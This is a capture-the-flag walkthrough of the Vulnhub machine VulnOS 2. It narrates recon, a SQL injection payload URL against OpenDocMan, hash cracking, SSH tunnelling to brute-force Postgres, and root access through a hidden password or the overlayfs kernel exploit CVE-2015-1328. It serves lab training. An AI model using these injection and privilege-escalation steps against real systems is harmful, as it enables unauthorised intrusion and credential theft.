This post describe the necessary steps to gain root in VulnOS 2 available on Vulnhub (https://www.vulnhub.com/). The goals of this box, according to the autor c4b3rw0lf (https://twitter.com/@c4b3rw0lf), is to get root of the system and read the final flag.
Machine Name: VulnOS: 2
Resource URL: https://www.vulnhub.com/entry/vulnos-2,147/
Release Data: 17 May 2016
Summary
To obtain administrative access in this box, the follow kill chain have been executed.
- Ports and services enumeration.
- Recon against web application.
- SQLi vulnerability in documentation app allowed the attacker to leak database information, including credentials.
- Access with valid credentials (webmin:webmin1980) using SSH service.
- Found credential from user vulnosadmin in postgre database.
- Laterializaton to user vulnosadmin and r00t.blend file.
- Root Access.
WriteUp
Recon
During the recon step, the attacker are able to enumerate ports and services using nmap port scanner.
The nmap tool detected 3 ports with the status open, 22/TCP, 80/TCP and 6667/TCP. In order to enumerate the web application located at port 80/TCP, provide by a Apache 2.4.7, the attacker are able to execute a bruteforce attack to identify files and directories in the application.
Nikto revealed the directory /jabc in the application and others files related to a web application. The directory http://192.168.1.107/jabc/?q=node/7 has a information of a new directory /jabcd0cs/ and access credential (guest/guest).
The webapp found at /jabcd0cs/ is called OpenDocMan. This application has multiples vulnerabilities:
- SQL Injection in OpenDocMan: CVE-2014-1945
- Improper Access Control in OpenDocMan: CVE-2014-1946
Exploitation
In the exploitation step, the attacker identified a SQLinjection at the URL: http://192.168.1.107/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version.
The information available in the database, include usernames,passwords and emails, but, the passwords are encrypted.
In order to decript the password, the hash has been submited to website CrackStation (https://crackstation.net/) and MD5Decrupt (https://www.md5decrypt.org/). The md5decrypt was able to dedcript the password from user webmin, the password is webmin1980
The attacker was use the credential from webmin to authenticate with the SSH service.
Privilege Escalation Part 1
In order to obtain more privileges in the system, the attacker was run the tool called LinEnum (https://github.com/rebootuser/LinEnum) to gathering information about the target system.
The postgres in target system, is listen at a local interface ( 127.0.0.1), to execute a brute force attack is necessary to pivote the traffic to the target local interface. To accomplished this, the attacker was use the SSH to create a tunnel between the attacker machine and the Postgres service inside the target system.
The brute force attack identified the password for the user postgres, the password is postgres
The credential from user postgres allowed the attacker to dump the database.
Credential from user vulnosadmin has been found in the postgres dump, the password is in clear text.
Lateralizating to user vulnosadmin. The file r00t.blend is found in the $HOME directory from user vulnosadmin.
The root password have been found inside the file r00t.blend, hide inside a object.
With the root password ab12fg//drg, the attacker is able to login into root account.
Using the root account, the attacker is able to get the flag.
Privilege Escalation Part 2
The kernel version in the target system is Ubuntu 14.04.4 LTS, this kernel version is vulnerable to the CVE-2015-1328( https://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html) . This vulnerability occours in the overlayfs implementation in the linux (aka Linux kernel) package before 3.19.0-21.21 in Ubuntu through 15.04 does not properly check permissions for file creation in the upper filesystem directory, which allows local users to obtain root access by leveraging a configuration in which overlayfs is permitted in an arbitrary mount namespace.
When the exploit executes, a root shell spawn in the terminal, allowing the attacker to get administrative acccess.
Conclusion
This machine is not all like real world, the natural way to get root access is really nonsense, no one hide the root password inside that. But the steps, recon, exploitation and parts of privileged escalation is pretty nice.